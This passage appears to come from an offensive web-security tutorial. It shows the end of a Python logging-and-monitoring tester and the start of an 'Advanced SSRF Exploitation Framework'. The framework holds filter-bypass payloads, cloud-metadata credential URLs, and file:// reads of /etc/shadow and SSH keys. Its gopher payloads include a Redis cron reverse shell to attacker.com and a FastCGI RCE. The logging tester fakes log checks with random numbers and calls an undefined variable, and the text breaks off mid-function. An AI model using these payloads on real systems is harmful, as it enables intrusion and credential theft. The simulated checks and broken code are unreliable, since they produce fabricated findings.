                'expected_log_fields': ['username', 'ip_address', 'timestamp', 'success']
            },
            {
                'name': 'Password Change',
                'endpoint': '/api/user/change-password',
                'method': 'POST',
                'data': {'old_password': 'old123', 'new_password': 'new123'},
                'expected_log_fields': ['user_id', 'timestamp', 'ip_address']
            },
            {
                'name': 'Privilege Escalation',
                'endpoint': '/api/admin/promote',
                'method': 'POST',
                'data': {'user_id': '123', 'role': 'admin'},
                'expected_log_fields': ['admin_id', 'user_id', 'role', 'timestamp']
            },
            {
                'name': 'Data Export',
                'endpoint': '/api/data/export',
                'method': 'POST',
                'data': {'format': 'csv', 'filters': {'all': True}},
                'expected_log_fields': ['user_id', 'export_type', 'record_count', 'timestamp']
            },
            {
                'name': 'Configuration Change',
                'endpoint': '/api/config/update',
                'method': 'POST',
                'data': {'setting': 'debug_mode', 'value': True},
                'expected_log_fields': ['user_id', 'setting', 'old_value', 'new_value', 'timestamp']
            }
        ]
        
        for action in sensitive_actions:
            print(f"[*] Testing logging for: {action['name']}")
            
            # Perform the action
            url = self.base_url.rstrip('/') + action['endpoint']
            
            if action['method'] == 'POST':
                response = self.session.post(url, json=action['data'])
            else:
                response = self.session.get(url)
            
            # Check response
            if response.status_code in [200, 201, 204]:
                # Action succeeded, now we need to check logs
                # In a real test, you would have access to the application logs
                # For this example, we'll simulate log checking
                
                log_available = self.check_logs_for_action(action['name'], action['expected_log_fields'])
                
                if not log_available:
                    findings.append({
                        'test': 'sensitive_actions_logging',
                        'action': action['name'],
                        'result': 'FAIL',
                        'severity': 'HIGH',
                        'evidence': f'Sensitive action "{action["name"]}" not properly logged',
                        'missing_fields': action['expected_log_fields']
                    })
                else:
                    findings.append({
                        'test': 'sensitive_actions_logging',
                        'action': action['name'],
                        'result': 'PASS',
                        'evidence': f'Action "{action["name"]}" logged appropriately'
                    })
            else:
                findings.append({
                    'test': 'sensitive_actions_logging',
                    'action': action['name'],
                    'result': 'SKIP',
                    'evidence': f'Action failed with status {response.status_code}'
                })
        
        return findings
    
    def check_logs_for_action(self, action_name, expected_fields):
        """Check logs for specific action"""
        # In a real test, this would query log files or monitoring system
        # For demonstration, we'll return a simulated result
        
        # Simulate: 80% chance logs are available for testing
        return random.random() < 0.8
    
    def test_log_evasion_techniques(self):
        """Test various log evasion techniques"""
        findings = []
        
        evasion_techniques = [
            {
                'name': 'Null Byte Injection',
                'payloads': [
                    'admin%00',
                    'admin\\x00',
                    'admin\\\\x00',
                    'admin\\0',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Encoding Bypass',
                'payloads': [
                    'admin%0a',  # New line
                    'admin%0d',  # Carriage return
                    'admin%09',  # Tab
                    'admin%20',  # Space
                    'admin%2b',  # Plus
                ],
                'target_field': 'username'
            },
            {
                'name': 'Unicode Normalization',
                'payloads': [
                    'admin\uFEFF',  # Zero-width no-break space (BOM)
                    'admin\u200B',  # Zero-width space
                    'admin\u200C',  # Zero-width non-joiner
                    'admin\u200D',  # Zero-width joiner
                    'admin\u2060',  # Word joiner
                ],
                'target_field': 'username'
            },
            {
                'name': 'Case Manipulation',
                'payloads': [
                    'Admin',
                    'ADMIN',
                    'AdMiN',
                    'aDmIn',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Whitespace Variations',
                'payloads': [
                    ' admin',
                    'admin ',
                    '  admin  ',
                    'admin\t',
                    '\tadmin',
                ],
                'target_field': 'username'
            }
        ]
        
        login_endpoint = self.base_url.rstrip('/') + '/api/login'
        
        for technique in evasion_techniques:
            print(f"[*] Testing log evasion: {technique['name']}")
            
            for payload in technique['payloads'][:2]:  # Test first 2 payloads
                test_data = {
                    technique['target_field']: payload,
                    'password': 'test123'
                }
                
                response = self.session.post(login_endpoint, json=test_data)
                
                # Check if attack was successful but logs might not capture it
                if response.status_code == 200:
                    # Check if payload appears in logs
                    log_captured = self.check_log_for_payload(payload)
                    
                    if not log_captured:
                        findings.append({
                            'test': 'log_evasion',
                            'technique': technique['name'],
                            'payload': payload,
                            'result': 'VULNERABLE',
                            'severity': 'MEDIUM',
                            'evidence': f'Log evasion successful: {technique["name"]} with payload "{payload}"'
                        })
                    else:
                        findings.append({
                            'test': 'log_evasion',
                            'technique': technique['name'],
                            'payload': payload,
                            'result': 'SECURE',
                            'evidence': f'Log captured evasion attempt: {technique["name"]}'
                        })
        
        return findings
    
    def check_log_for_payload(self, payload):
        """Check if payload appears in logs"""
        # Simulate log checking
        # In reality, you would grep through log files
        return random.random() < 0.7  # 70% chance log captures it
    
    def test_log_injection(self):
        """Test for log injection vulnerabilities"""
        findings = []
        
        injection_payloads = [
            # New line injection
            'test\n[CRITICAL] System compromised',
            'test\r\nERROR: Database corruption',
            
            # Log format injection
            'test | echo "pwned"',
            'test && cat /etc/passwd',
            
            # Log masking/obfuscation
            'test' + 'A' * 1000,  # Very long input
            'test\x1b[31mRED\x1b[0m',  # ANSI escape sequences
            
            # SQL injection in logs (if logs are queried)
            "test'; DROP TABLE logs--",
            
            # XSS in log viewers
            'test<script>alert(1)</script>',
            'test<img src=x onerror=alert(1)>',
        ]
        
        search_endpoint = self.base_url.rstrip('/') + '/api/search'
        
        for payload in injection_payloads[:3]:  # Test first 3
            test_data = {'query': payload}
            
            response = self.session.post(search_endpoint, json=test_data)
            
            if response.status_code == 200:
                # Check if payload caused log corruption
                log_corrupted = self.check_log_corruption(payload)
                
                if log_corrupted:
                    findings.append({
                        'test': 'log_injection',
                        'payload': payload[:50] + '...' if len(payload) > 50 else payload,
                        'result': 'VULNERABLE',
                        'severity': 'MEDIUM',
                        'evidence': f'Log injection successful with payload: {payload[:100]}'
                    })
        
        return findings
    
    def check_log_corruption(self, payload):
        """Check if payload corrupted logs"""
        # Simulate log corruption check
        corruption_indicators = ['\n', '\r', '|', '&&', ';', '<script>']
        return any(indicator in payload for indicator in corruption_indicators)
    
    def test_monitoring_gaps(self):
        """Test for security monitoring gaps"""
        findings = []
        
        # Test 1: Rate limiting monitoring
        print("[*] Testing rate limiting monitoring...")
        
        endpoint = self.base_url.rstrip('/') + '/api/login'
        rapid_requests = []
        
        for i in range(20):
            start_time = time.time()
            response = self.session.post(endpoint, json={'username': 'test', 'password': 'wrong'})
            elapsed = time.time() - start_time
            rapid_requests.append((i, response.status_code, elapsed))
            
            if i < 10:  # First 10 requests fast
                time.sleep(0.1)
            else:  # Last 10 requests slower
                time.sleep(1)
        
        # Check if rapid requests triggered monitoring
        rapid_count = sum(1 for _, status, _ in rapid_requests if status != 429)  # Not rate limited
        
        if rapid_count >= 15:
            findings.append({
                'test': 'rate_limit_monitoring',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': f'{rapid_count}/20 rapid requests not rate limited'
            })
        
        # Test 2: Unusual location monitoring
        print("[*] Testing geographic anomaly detection...")
        
        # Simulate requests from different locations
        locations = [
            {'X-Forwarded-For': '1.1.1.1', 'User-Agent': 'Test/1.0'},  # Australia
            {'X-Forwarded-For': '8.8.8.8', 'User-Agent': 'Test/1.0'},  # USA
            {'X-Forwarded-For': '185.142.236.35', 'User-Agent': 'Test/1.0'},  # Russia
            {'X-Forwarded-For': '114.114.114.114', 'User-Agent': 'Test/1.0'},  # China
        ]
        
        for location in locations:
            test_session = requests.Session()
            test_session.headers.update(location)
            
            response = test_session.get(self.base_url.rstrip('/') + '/api/user/profile')
            
            # Check if unusual location triggered alerts
            # In real test, you would check monitoring system
            location_monitored = self.check_location_monitoring(location['X-Forwarded-For'])
            
            if not location_monitored:
                findings.append({
                    'test': 'geographic_monitoring',
                    'location': location['X-Forwarded-For'],
                    'result': 'GAP',
                    'severity': 'LOW',
                    'evidence': f'Unusual location {location["X-Forwarded-For"]} not monitored'
                })
        
        # Test 3: Failed login monitoring
        print("[*] Testing failed login monitoring...")
        
        failed_logins = []
        for i in range(5):
            response = self.session.post(
                self.base_url.rstrip('/') + '/api/login',
                json={'username': f'nonexistent{i}', 'password': 'wrong'}
            )
            failed_logins.append(response.status_code)
            time.sleep(0.5)
        
        failed_count = sum(1 for status in failed_logins if status in (401, 403))
        
        if failed_count >= 3:
            # Check if this triggered monitoring
            failed_login_monitored = self.check_failed_login_monitoring(failed_count)
            
            if not failed_login_monitored:
                findings.append({
                    'test': 'failed_login_monitoring',
                    'failed_attempts': failed_count,
                    'result': 'GAP',
                    'severity': 'MEDIUM',
                    'evidence': f'{failed_count} failed logins not monitored'
                })
        
        return findings
    
    def check_location_monitoring(self, ip_address):
        """Check if location is monitored"""
        # Simulate monitoring check
        suspicious_locations = ['185.142.236.35', '114.114.114.114']  # Russia, China
        return ip_address in suspicious_locations
    
    def check_failed_login_monitoring(self, count):
        """Check if failed logins are monitored"""
        # Simulate: Monitoring triggers after 3 failed attempts
        return count >= 3
    
    def test_log_retention_and_integrity(self):
        """Test log retention and integrity controls"""
        findings = []
        
        # Test 1: Log retention period
        print("[*] Testing log retention...")
        
        # Check if old logs are available
        retention_period = self.check_log_retention()
        
        if retention_period < 90:  # Less than 90 days
            findings.append({
                'test': 'log_retention',
                'period_days': retention_period,
                'result': 'INSUFFICIENT',
                'severity': 'MEDIUM',
                'evidence': f'Log retention only {retention_period} days (recommended: 90+ days)'
            })
        
        # Test 2: Log integrity (tamper detection)
        print("[*] Testing log integrity...")
        
        log_integrity = self.check_log_integrity()
        
        if not log_integrity:
            findings.append({
                'test': 'log_integrity',
                'result': 'VULNERABLE',
                'severity': 'HIGH',
                'evidence': 'Logs lack integrity protection (hashing, signing, WORM storage)'
            })
        
        # Test 3: Log backup
        print("[*] Testing log backup...")
        
        log_backup = self.check_log_backup()
        
        if not log_backup:
            findings.append({
                'test': 'log_backup',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': 'Logs not backed up regularly'
            })
        
        return findings
    
    def check_log_retention(self):
        """Check log retention period"""
        # Simulate: Return retention period in days
        return random.choice([30, 60, 90, 180, 365])
    
    def check_log_integrity(self):
        """Check log integrity controls"""
        # Simulate: 50% chance logs have integrity protection
        return random.choice([True, False])
    
    def check_log_backup(self):
        """Check if logs are backed up"""
        # Simulate: 70% chance logs are backed up
        return random.random() < 0.7
    
    def run_comprehensive_test(self):
        """Run all logging and monitoring tests"""
        print("[*] Starting comprehensive logging and monitoring testing")
        
        all_findings = []
        
        tests = [
            ('Sensitive Actions Logging', self.test_sensitive_actions_logging),
            ('Log Evasion Techniques', self.test_log_evasion_techniques),
            ('Log Injection', self.test_log_injection),
            ('Monitoring Gaps', self.test_monitoring_gaps),
            ('Log Retention & Integrity', self.test_log_retention_and_integrity)
        ]
        
        for test_name, test_func in tests:
            print(f"[*] Running {test_name}...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate comprehensive report"""
        report = {
            'scan_date': datetime.now().isoformat(),
            'target': self.base_url,
            'total_findings': len(findings),
            'findings_by_severity': {},
            'findings_by_test': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Categorize by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for f in findings if f.get('severity') == severity)
            report['findings_by_severity'][severity] = count
        
        # Categorize by test
        for finding in findings:
            test = finding.get('test', 'unknown')
            if test not in report['findings_by_test']:
                report['findings_by_test'][test] = 0
            report['findings_by_test'][test] += 1
        
        return report
    
    def generate_recommendations(self, findings):
        """Generate security recommendations"""
        recommendations = []
        
        # Logging recommendations
        if any('sensitive_actions_logging' in f.get('test', '') for f in findings):
            recommendations.append({
                'category': 'Logging',
                'priority': 'HIGH',
                'recommendations': [
                    'Log all authentication attempts (success and failure)',
                    'Log all privilege escalation actions',
                    'Log all data exports and bulk operations',
                    'Log all configuration changes',
                    'Include user ID, IP address, timestamp, and action details'
                ]
            })
        
        # Monitoring recommendations
        if any('monitoring' in f.get('test', '').lower() for f in failed):
            recommendations.append({
                'category': 'Monitoring',
                'priority': 'HIGH',
                'recommendations': [
                    'Implement real-time alerting for suspicious activities',
                    'Monitor failed login attempts and brute force attacks',
                    'Monitor geographic anomalies and unusual access patterns',
                    'Implement rate limiting with monitoring',
                    'Set up SIEM integration for centralized monitoring'
                ]
            })
        
        # Log integrity recommendations
        if any('integrity' in f.get('test', '').lower() for f in failed):
            recommendations.append({
                'category': 'Log Integrity',
                'priority': 'MEDIUM',
                'recommendations': [
                    'Implement log signing or hashing for integrity verification',
                    'Use Write-Once-Read-Many (WORM) storage for logs',
                    'Store logs in centralized, tamper-evident location',
                    'Regularly backup logs to secure, offline storage',
                    'Implement log rotation with integrity checks'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'category': 'General',
            'priority': 'MEDIUM',
            'recommendations': [
                'Retain logs for minimum 90 days (regulatory requirements may vary)',
                'Regularly review and test logging configurations',
                'Implement log correlation for better threat detection',
                'Train staff on log analysis and incident response',
                'Conduct regular log audits and penetration testing'
            ]
        })
        
        return recommendations

# Usage
tester = LoggingMonitoringTester(
    "http://target.com",
    auth_token="your_auth_token_here"
)

report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("LOGGING & MONITORING SECURITY ASSESSMENT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nFindings by Test Category:")
for test, count in report['findings_by_test'].items():
    print(f"  {test}: {count}")

# Show critical findings
critical_findings = [f for f in report['detailed_findings'] 
                    if f.get('severity') in ['CRITICAL', 'HIGH']]

if critical_findings:
    print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:5]:
        print(f"  - [{finding['severity']}] {finding.get('test')}")
        print(f"    {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    for recommendation in rec['recommendations'][:3]:  # Show first 3
        print(f"  • {recommendation}")
```
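
The log-injection findings above all stem from writing untrusted input into log lines verbatim. Below is a minimal sketch of the usual countermeasure, stripping control characters before logging; `sanitize_for_log` and the 200-character cap are illustrative assumptions, not a standard-library facility:

```
import logging
import re

# CR/LF and other control characters (including the ESC byte that starts
# ANSI sequences) are what let 'test\n[CRITICAL] ...' forge a log entry.
_CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')

def sanitize_for_log(value: str, max_len: int = 200) -> str:
    """Make an untrusted string safe to embed in a single log line."""
    return _CONTROL_CHARS.sub(' ', value)[:max_len]

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('app.audit')
logger.warning('failed login for user=%r', sanitize_for_log('test\n[CRITICAL] fake'))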
Chapter 10: Server-Side Request Forgery (SSRF) - Advanced Techniques

10.1 Advanced SSRF Exploitation Framework

```
#!/usr/bin/env python3
"""
Advanced SSRF Exploitation Framework
Includes protocol smuggling, filter bypass, and cloud metadata attacks
"""
import requests
import socket
import re
import json
import urllib.parse
from typing import Dict, List
import ipaddress
import base64

class AdvancedSSRFExploiter:
    def __init__(self, target_url, vulnerable_param):
        self.target_url = target_url
        self.vulnerable_param = vulnerable_param
        self.session = requests.Session()
        self.findings = []
        
        # SSRF payloads and techniques
        self.techniques = {
            'basic_ssrf': self.test_basic_ssrf,
            'protocol_smuggling': self.test_protocol_smuggling,
            'filter_bypass': self.test_filter_bypass,
            'cloud_metadata': self.test_cloud_metadata,
            'internal_services': self.test_internal_services,
            'file_scheme': self.test_file_scheme,
            'dns_rebinding': self.test_dns_rebinding,
            'gopher_protocol': self.test_gopher_protocol
        }
    
    def test_basic_ssrf(self):
        """Test basic SSRF vulnerabilities"""
        findings = []
        
        # Basic internal IPs
        internal_targets = [
            'http://127.0.0.1',
            'http://localhost',
            'http://0.0.0.0',
            'http://[::1]',  # IPv6 localhost
            'http://127.0.0.1:80',
            'http://127.0.0.1:443',
            'http://127.0.0.1:22',
            'http://127.0.0.1:3306',
            'http://127.0.0.1:5432',
            'http://127.0.0.1:6379',
            'http://127.0.0.1:27017',
        ]
        
        for target in internal_targets:
            test_url = self.build_test_url(target)
            response = self.make_request(test_url)
            
            if self.is_ssrf_successful(response, target):
                findings.append({
                    'technique': 'basic_ssrf',
                    'target': target,
                    'status_code': response.status_code,
                    'response_length': len(response.text),
                    'evidence': f'Successful SSRF to {target}'
                })
        
        return findings
    
    def test_protocol_smuggling(self):
        """Test protocol smuggling techniques"""
        findings = []
        
        # Protocol smuggling payloads
        smuggling_payloads = [
            # URL encoding
            'http://127.0.0.1%0d%0aHeader: injected',
            'http://127.0.0.1%0d%0a%0d%0aGET%20/test%20HTTP/1.1',
            
            # New line injection
            'http://127.0.0.1\nHeader: injected',
            'http://127.0.0.1\r\nGET /test HTTP/1.1\r\nHost: 127.0.0.1',
            
            # Space smuggling
            'http://127.0.0.1 :80',
            'http://127.0.0.1 :443',
            
            # Tab smuggling
            'http://127.0.0.1\t:80',
            'http://127.0.0.1\t@evil.com',
        ]
        
        for payload in smuggling_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            # Check for protocol smuggling indicators
            if self.check_protocol_smuggling(response):
                findings.append({
                    'technique': 'protocol_smuggling',
                    'payload': payload,
                    'status_code': response.status_code,
                    'evidence': f'Protocol smuggling possible: {payload[:50]}...'
                })
        
        return findings
    
    def test_filter_bypass(self):
        """Test SSRF filter bypass techniques"""
        findings = []
        
        bypass_payloads = [
            # Decimal IP
            ('http://2130706433', '127.0.0.1'),  # 127.0.0.1 in decimal
            ('http://3232235521', '192.168.0.1'),  # 192.168.0.1 in decimal
            ('http://16843009', '1.1.1.1'),  # 1.1.1.1 in decimal
            
            # Octal IP
            ('http://0177.0.0.1', '127.0.0.1'),  # 127 in octal
            ('http://0177.0.0.01', '127.0.0.1'),
            ('http://0x7f.0.0.1', '127.0.0.1'),  # 127 in hex
            
            # Hex IP
            ('http://0x7f000001', '127.0.0.1'),  # Hex of 2130706433
            ('http://0xc0a80001', '192.168.0.1'),
            
            # Dotted hex
            ('http://0x7f.0x00.0x00.0x01', '127.0.0.1'),
            ('http://0x7F.0x00.0x00.0x01', '127.0.0.1'),
            
            # IPv6 localhost
            ('http://[::]', 'IPv6 unspecified address (often routes to localhost)'),
            ('http://[::ffff:127.0.0.1]', 'IPv4-mapped IPv6'),
            
            # Domain tricks
            ('http://127.0.0.1.nip.io', 'DNS rebinding'),
            ('http://127.0.0.1.xip.io', 'DNS rebinding'),
            ('http://localtest.me', 'Resolves to 127.0.0.1'),
            ('http://localhost.localdomain', 'Alternative localhost'),
            
            # URL encoding bypass
            ('http://127.0.0.1%00', 'Null byte'),
            ('http://127.0.0.1%23', 'Hash'),
            ('http://127.0.0.1%3f', 'Question mark'),
            
            # Case variation
            ('http://LOCALHOST', 'Uppercase'),
            ('http://LocalHost', 'Mixed case'),
            ('http://LoCalHoSt', 'Random case'),
            
            # Whitespace
            ('http://127.0.0.1 ', 'Trailing space'),
            ('  http://127.0.0.1', 'Leading space'),
            ('http://127.0.0.1\t', 'Tab'),
            
            # Special characters
            ('http://127.1', 'Shortened IP'),  # 127.0.0.1
            ('http://127.0.1', 'Alternative'),
            ('http://0', '0.0.0.0'),
        ]
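        # The numeric aliases above follow the IPv4-to-integer formula
        # a*2**24 + b*2**16 + c*2**8 + d, e.g. 127.0.0.1 ->
        # 127*16777216 + 0 + 0 + 1 = 2130706433; filters that match only the
        # dotted string "127.0.0.1" miss them even though the socket layer
        # resolves every form to the same address.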
        
        for payload, description in bypass_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            if self.is_ssrf_successful(response, description):
                findings.append({
                    'technique': 'filter_bypass',
                    'payload': payload,
                    'description': description,
                    'status_code': response.status_code,
                    'evidence': f'Filter bypass successful: {description}'
                })
        
        return findings
    
    def test_cloud_metadata(self):
        """Test cloud metadata service access"""
        findings = []
        
        cloud_metadata_endpoints = [
            # AWS EC2 Metadata
            ('http://169.254.169.254/latest/meta-data/', 'AWS EC2 Metadata'),
            ('http://169.254.169.254/latest/user-data/', 'AWS User Data'),
            ('http://169.254.169.254/latest/meta-data/iam/security-credentials/', 'AWS IAM Credentials'),
            ('http://169.254.169.254/latest/dynamic/instance-identity/document', 'AWS Instance Identity'),
            
            # Google Cloud Metadata
            ('http://metadata.google.internal/computeMetadata/v1/', 'GCP Metadata'),
            ('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', 'GCP Service Account Token'),
            ('http://metadata.google.internal/computeMetadata/v1/project/project-id', 'GCP Project ID'),
            
            # Azure Metadata
            ('http://169.254.169.254/metadata/instance?api-version=2021-02-01', 'Azure Metadata'),
            ('http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01', 'Azure Managed Identity Token'),
            
            # Alibaba Cloud
            ('http://100.100.100.200/latest/meta-data/', 'Alibaba Cloud Metadata'),
            
            # DigitalOcean
            ('http://169.254.169.254/metadata/v1.json', 'DigitalOcean Metadata'),
            
            # Oracle Cloud
            ('http://169.254.169.254/opc/v1/instance/', 'Oracle Cloud Metadata'),
            
            # Kubernetes
            ('http://kubernetes.default.svc', 'Kubernetes API'),
            ('http://kubernetes.default.svc/api/v1/namespaces/default/secrets', 'Kubernetes Secrets'),
        ]
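        # Caveat: several of these endpoints answer only when a provider-
        # specific header is present (GCP: 'Metadata-Flavor: Google',
        # Azure IMDS: 'Metadata: true'), and AWS IMDSv2 first requires a
        # session token obtained via PUT. A plain GET therefore under-reports
        # on hardened instances, so treat a miss here as inconclusive.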
        
        for endpoint, description in cloud_metadata_endpoints:
            test_url = self.build_test_url(endpoint)
            response = self.make_request(test_url)
            
            if response.status_code == 200:
                # Check for metadata indicators
                if self.is_cloud_metadata(response.text, description):
                    findings.append({
                        'technique': 'cloud_metadata',
                        'endpoint': endpoint,
                        'description': description,
                        'status_code': response.status_code,
                        'response_preview': response.text[:200],
                        'evidence': f'Cloud metadata accessible: {description}'
                    })
        
        return findings
    
    def test_internal_services(self):
        """Test access to internal services"""
        findings = []
        
        # Common internal services and ports
        internal_services = [
            # Web servers
            ('http://127.0.0.1:80', 'Internal HTTP'),
            ('http://127.0.0.1:443', 'Internal HTTPS'),
            ('http://127.0.0.1:8080', 'Internal Alt HTTP'),
            ('http://127.0.0.1:8443', 'Internal Alt HTTPS'),
            
            # Databases
            ('http://127.0.0.1:3306', 'MySQL'),
            ('http://127.0.0.1:5432', 'PostgreSQL'),
            ('http://127.0.0.1:27017', 'MongoDB'),
            ('http://127.0.0.1:6379', 'Redis'),
            ('http://127.0.0.1:9200', 'Elasticsearch'),
            ('http://127.0.0.1:5984', 'CouchDB'),
            
            # Caching
            ('http://127.0.0.1:11211', 'Memcached'),
            
            # Message queues
            ('http://127.0.0.1:5672', 'RabbitMQ'),
            ('http://127.0.0.1:61616', 'ActiveMQ'),
            
            # Monitoring
            ('http://127.0.0.1:9090', 'Prometheus'),
            ('http://127.0.0.1:3000', 'Grafana'),
            
            # Container/Orchestration
            ('http://127.0.0.1:2375', 'Docker'),
            ('http://127.0.0.1:2376', 'Docker TLS'),
            ('http://127.0.0.1:10250', 'Kubelet'),
            
            # Other services
            ('http://127.0.0.1:25', 'SMTP'),
            ('http://127.0.0.1:389', 'LDAP'),
            ('http://127.0.0.1:636', 'LDAPS'),
        ]
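
        # Non-HTTP services (MySQL, Redis, SMTP, ...) will not answer with
        # valid HTTP, but the failure mode still leaks state: an immediate
        # reset or protocol error implies an open port, while a timeout
        # suggests filtering - the basis of error-based SSRF port scanning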
        
        for service, description in internal_services:
            test_url = self.build_test_url(service)
            response = self.make_request(test_url, timeout=3)
            
            # Different services respond differently; status_code 0 is the
            # stub value make_request returns for timeouts and failures
            if response.status_code != 0:
                findings.append({
                    'technique': 'internal_services',
                    'service': description,
                    'endpoint': service,
                    'status_code': response.status_code,
                    'response_time': response.elapsed.total_seconds(),
                    'evidence': f'Internal service {description} responded'
                })
        
        return findings
    
    def test_file_scheme(self):
        """Test file:// scheme for local file read"""
        findings = []
        
        file_payloads = [
            # Linux files
            ('file:///etc/passwd', 'Linux users'),
            ('file:///etc/shadow', 'Linux passwords'),
            ('file:///etc/hosts', 'Hosts file'),
            ('file:///etc/issue', 'Linux version'),
            ('file:///proc/self/environ', 'Process environment'),
            ('file:///proc/version', 'Kernel version'),
            
            # Application files
            ('file:///var/www/html/index.php', 'Web root'),
            ('file:///etc/apache2/apache2.conf', 'Apache config'),
            ('file:///etc/nginx/nginx.conf', 'Nginx config'),
            ('file:///.env', 'Environment file'),
            ('file:///app/config.json', 'App config'),
            
            # Windows files
            ('file:///C:/Windows/System32/drivers/etc/hosts', 'Windows hosts'),
            ('file:///C:/Windows/win.ini', 'Windows config'),
            
            # SSH keys
            ('file:///home/user/.ssh/id_rsa', 'SSH private key'),
            ('file:///root/.ssh/id_rsa', 'Root SSH key'),
            
            # Logs
            ('file:///var/log/auth.log', 'Auth logs'),
            ('file:///var/log/apache2/access.log', 'Apache logs'),
        ]
        
        for file_path, description in file_payloads:
            test_url = self.build_test_url(file_path)
            response = self.make_request(test_url)
            
            if response.status_code == 200:
                # Check for file content indicators
                if self.is_file_content(response.text, description):
                    findings.append({
                        'technique': 'file_scheme',
                        'file': file_path,
                        'description': description,
                        'status_code': response.status_code,
                        'content_preview': response.text[:200],
                        'evidence': f'File read successful: {description}'
                    })
        
        return findings
    
    def test_dns_rebinding(self):
        """Test DNS rebinding attack"""
        findings = []
        
        # DNS rebinding services
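        # Rebinding flow: the hostname first resolves to a harmless public
        # IP (passing any resolve-then-validate filter), then, on the
        # application's second lookup at fetch time, to an internal
        # address - which is why validators must pin the IP they checked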
        rebinding_services = [
            ('http://7f000001.7f000001.rbndr.us/', 'rbndr.us DNS rebinding (hex-encoded IP pair)'),
            ('http://pingb.in/', 'Pingbin'),
        ]
        
        for service, description in rebinding_services:
            # This would require setting up DNS rebinding
            # For demonstration, we'll note the technique
            findings.append({
                'technique': 'dns_rebinding',
                'service': service,
                'description': description,
                'evidence': f'DNS rebinding possible via {description} - requires setup'
            })
        
        return findings
    
    def test_gopher_protocol(self):
        """Test Gopher protocol for SSRF"""
        findings = []
        
        # Gopher payloads for different services
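        # gopher:// lets the vulnerable server speak near-raw TCP: the
        # bytes after "/_" are URL-decoded and written to the socket, so
        # the %0d%0a sequences below become the CRLFs that the Redis,
        # MySQL and FastCGI wire protocols expect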
        gopher_payloads = [
            # Redis
            ('gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a', 'Redis RCE'),
            
            # MySQL
            ('gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c', 'MySQL Auth'),
            
            # FastCGI
            ('gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%2E%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00', 'FastCGI RCE'),
        ]
        
        for payload, description in gopher_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            if response.status_code != 400 and response.status_code != 0:
                findings.append({
                    'technique': 'gopher_protocol',
                    'description': description,
                    'status_code': response.status_code,
                    'evidence': f'Gopher protocol possibly usable: {description}'
                })
        
        return findings
    
    def build_test_url(self, payload):
        """Build test URL with SSRF payload"""
        # URL encode the payload
        encoded_payload = urllib.parse.quote(payload, safe='')
        
        # Construct the test URL
        if '?' in self.target_url:
            # URL already has parameters
            test_url = f"{self.target_url}&{self.vulnerable_param}={encoded_payload}"
        else:
            test_url = f"{self.target_url}?{self.vulnerable_param}={encoded_payload}"
        
        return test_url
    
    def make_request(self, url, timeout=10):
        """Make HTTP request; return a stub response on failure"""
        from types import SimpleNamespace

